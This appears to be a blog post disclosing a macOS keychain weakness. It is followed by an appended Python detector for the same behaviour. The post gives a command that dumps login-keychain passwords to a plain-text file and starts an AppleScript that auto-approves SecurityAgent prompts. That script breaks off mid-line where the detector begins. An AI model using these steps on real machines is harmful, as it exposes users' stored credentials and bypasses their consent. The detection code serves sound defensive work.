Security Flaw in OS X displays all keychain passwords in plain text

This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.

There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing, this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.

The method consists of opening up terminal, and cutting and pasting the following code:

    security dump-keychain -d login.keychain > keychain.txt

You can circumvent all system dialogs by scripting that terminal command and adding the following:

    tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
    tell process "SecurityAgent"
    click button "Allow" of group
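A defender-side check for the two behaviours described above, as an added example that is not from the original article: it flags logged command lines that run `security dump-keychain` (raising severity when `-d` is present) or that script the SecurityAgent prompt through System Events. The event records, field names and finding labels are constructed for illustration.

```python
import shlex

# Constructed process-execution records; the field names are assumptions,
# not the schema of any particular EDR or macOS log source.
SAMPLE_EVENTS = [
    {"pid": 501, "cmd": "security dump-keychain -d login.keychain"},
    {"pid": 502, "cmd": "/usr/bin/security find-generic-password -s wifi"},
    {"pid": 503, "cmd": "/usr/bin/security dump-keychain -ad"},
    {"pid": 504, "cmd": "security dump-keychain login.keychain"},
    {"pid": 505, "cmd": "osascript -e 'tell application \"System Events\" "
                        "to tell process \"SecurityAgent\"'"},
]

def classify(cmd):
    """Return the set of findings for one logged command line."""
    try:
        argv = shlex.split(cmd)
    except ValueError:              # unbalanced quotes in a truncated log line
        argv = cmd.split()
    findings = set()
    is_security = bool(argv) and argv[0].rsplit("/", 1)[-1] == "security"
    if is_security and "dump-keychain" in argv[1:]:
        findings.add("keychain-dump")
        # -d requests decrypted item data; short flags may be combined (-ad).
        rest = argv[argv.index("dump-keychain") + 1:]
        opts = [a for a in rest if a.startswith("-") and not a.startswith("--")]
        if any("d" in o[1:] for o in opts):
            findings.add("plaintext-secrets")
    # The shell redirect (> keychain.txt) never reaches argv, so the output
    # file cannot be matched here; match the scripting of the prompt instead.
    if "System Events" in cmd and "SecurityAgent" in cmd:
        findings.add("securityagent-ui-scripting")
    return findings

def triage(events):
    """Map pid -> (severity, sorted findings) for records worth an alert."""
    alerts = {}
    for ev in events:
        found = classify(ev["cmd"])
        if not found:
            continue
        high = found & {"plaintext-secrets", "securityagent-ui-scripting"}
        alerts[ev["pid"]] = ("high" if high else "medium", sorted(found))
    return alerts

if __name__ == "__main__":
    for pid, (severity, found) in triage(SAMPLE_EVENTS).items():
        print(pid, severity, ", ".join(found))
```

Alerting on the SecurityAgent scripting separately matters because it can run in a different process from the dump itself, so the two events need to be correlated by host and time window.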


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/cG_9wyZv5Gk/security-flaw-in-os-x-displays-all-keychain-passwords-in-plain-text-a530b246e960
